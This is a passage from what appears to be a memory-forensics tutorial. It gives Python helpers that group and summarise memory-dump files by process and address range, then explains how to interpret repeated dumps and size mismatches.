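    """Collapse repeated dumps of the same region; the seq list shows how often it was re-dumped."""
    regions = defaultdict(list)
    for name, _ in entries:
        d = parse_dump_name(name)
        regions[(d["pid"], d["start"], d["end"])].append(d["seq"])
    return {key: sorted(seqs) for key, seqs in regions.items()}


def per_pid_summary(entries):
    """Per process: distinct regions, total dumps, unique bytes captured, regions in the image range."""
    out = {}
    for (pid, start, end), seqs in unique_regions(entries).items():
        s = out.setdefault(pid, {"regions": 0, "dumps": 0, "unique_bytes": 0, "image_range": 0})
        s["regions"] += 1
        s["dumps"] += len(seqs)
        s["unique_bytes"] += end - start
        s["image_range"] += region_kind(start) == "image-range"
    for s in out.values():
        s["unique"] = human_size(s.pop("unique_bytes"))
    return out


if __name__ == "__main__":
    print("size mismatches:", check_sizes(SAMPLE_DUMPS))
    for (pid, start, end), seqs in unique_regions(SAMPLE_DUMPS).items():
        print(f"pid {pid} 0x{start:016X}-0x{end:016X} {human_size(end - start):>7} "
              f"{region_kind(start):<14} dumped {len(seqs)}x (seq {seqs})")
    for pid, s in per_pid_summary(SAMPLE_DUMPS).items():
        print(f"pid {pid}: {s['regions']} regions, {s['dumps']} dumps, {s['unique']} unique")
```

Run against the full list above, the per-process view is what to read first: a process whose single image-range region was dumped many times over the run is being re-captured as its memory changes, while a process with many small private-range regions (PID 3308 above) is more likely holding decoded data or configuration worth carving. A non-empty result from `check_sizes` means the name and the listed size disagree and the dump should be re-examined before any conclusion is drawn from it.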
